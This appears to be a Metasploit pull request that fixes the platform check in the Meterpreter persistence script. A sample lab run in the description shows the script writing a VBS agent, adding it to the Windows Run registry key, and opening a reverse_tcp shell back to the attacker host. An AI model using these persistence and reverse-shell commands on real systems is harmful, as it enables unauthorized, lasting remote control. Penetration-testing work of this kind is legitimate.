### PR TITLE
Fix persistence script to work with new platform changes

### DIFF
--- a/scripts/meterpreter/persistence.rb
+++ b/scripts/meterpreter/persistence.rb
@@ -40,7 +40,6 @@ script_on_target = nil
   "-T"  => [ true,   "Alternate executable template to use"],
   "-P"  => [ true,   "Payload to use, default is windows/meterpreter/reverse_tcp."]
 )
-meter_type = client.platform
 
 ################## Function Declarations ##################
 
@@ -54,7 +53,7 @@ end
 
 # Wrong Meterpreter Version Message Function
 #-------------------------------------------------------------------------------
-def wrong_meter_version(meter = meter_type)
+def wrong_meter_version(meter)
   print_error("#{meter} version of Meterpreter is not supported with this Script!")
   raise Rex::Script::Completed
 end
@@ -227,7 +226,10 @@ end
 }
 
 # Check for Version of Meterpreter
-wrong_meter_version(meter_type) if meter_type !~ /win32|win64/i
+unless client.platform == 'windows' && [ARCH_X86, ARCH_X64].include?(client.arch)
+  wrong_meter_version(client.session_type)
+end
+
 print_status("Running Persistence Script")
 # Create undo script
 @clean_up_rc = log_file()


### PR DESCRIPTION
The persistence script that many people use was broken thanks to the recent platform changes. My guess is that there are more broken scripts, but I haven't got the time to go and validate them just yet.

The bug was reported in #7701, this PR fixes it:

## Sample run
```
msf exploit(handler) > sessions

Active sessions
===============

  Id  Type                     Information                           Connection
  --  ----                     -----------                           ----------
  1   meterpreter x86/windows  DESKTOP-5A73R51\oj @ DESKTOP-5A73R51  172.16.255.1:5000 -> 172.16.255.131:51472 (172.16.255.131)

msf exploit(handler) > sess -1
[*] Starting interaction with 1...

meterpreter > run persistence -U -i 30 -p 5000 -r 172.16.255.1
[*] Running Persistence Script
[*] Resource file for cleanup created at /Users/oj/.msf4/logs/persistence/DESKTOP-5A73R51_20161212.1944/DESKTOP-5A73R51_20161212.1944.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=172.16.255.1 LPORT=5000
[*] Persistent agent script is 99627 bytes long
[+] Persistent Script written to C:\Users\oj\AppData\Local\Temp\LorRUckCzXddH.vbs
[*] Executing script C:\Users\oj\AppData\Local\Temp\LorRUckCzXddH.vbs
[+] Agent executed with PID 6600
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\snVWNAYHtw
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\snVWNAYHtw


[*] [2016.12.12-11:19:45] Sending stage (957999 bytes) to 172.16.255.131
[*] Meterpreter session 2 opened (172.16.255.1:5000 -> 172.16.255.131:51475) at 2016-12-12 11:19:46 +1000
meterpreter > background
[*] Backgrounding session 1...

msf exploit(handler) > sessions

Active sessions
===============

  Id  Type                     Information                           Connection
  --  ----                     -----------                           ----------
  1   meterpreter x86/windows  DESKTOP-5A73R51\oj @ DESKTOP-5A73R51  172.16.255.1:5000 -> 172.16.255.131:51472 (172.16.255.131)
  2   meterpreter x86/windows  DESKTOP-5A73R51\oj @ DESKTOP-5A73R51  172.16.255.1:5000 -> 172.16.255.131:51475 (172.16.255.131)
```

## Verification

- [x] Get a native windows meterpreter session
- [x] Run the persistence script
- [x] It should work on both x64 and x86
- [x] Running a non-native Meterpreter on windows should fail.